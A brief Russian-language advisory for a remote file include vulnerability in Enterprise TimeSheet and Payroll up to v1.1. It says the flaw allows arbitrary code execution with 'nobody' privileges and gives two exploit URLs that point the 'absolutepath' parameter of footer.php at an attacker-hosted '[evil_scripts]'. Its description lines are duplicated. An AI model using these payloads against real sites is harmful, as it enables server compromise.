Enterprise TimeSheet and Payroll (EPS) <= v.1.1 Remote File Include Vulnerability
Описание:
Позволяет выполнять произвольный код на удаленной машине с привилегиями nobody.
Пример/Эксплоит:
Описание:
Позволяет выполнять произвольный код на удаленной машине с привилегиями nobody.
Пример/Эксплоит:
Код:
http://www.site.com/[EPS_path]/footer.php?absolutepath=[evil_scripts]
http://www.site.com/[EPS_path]/admin/footer.php?absolutepath=[evil_scripts]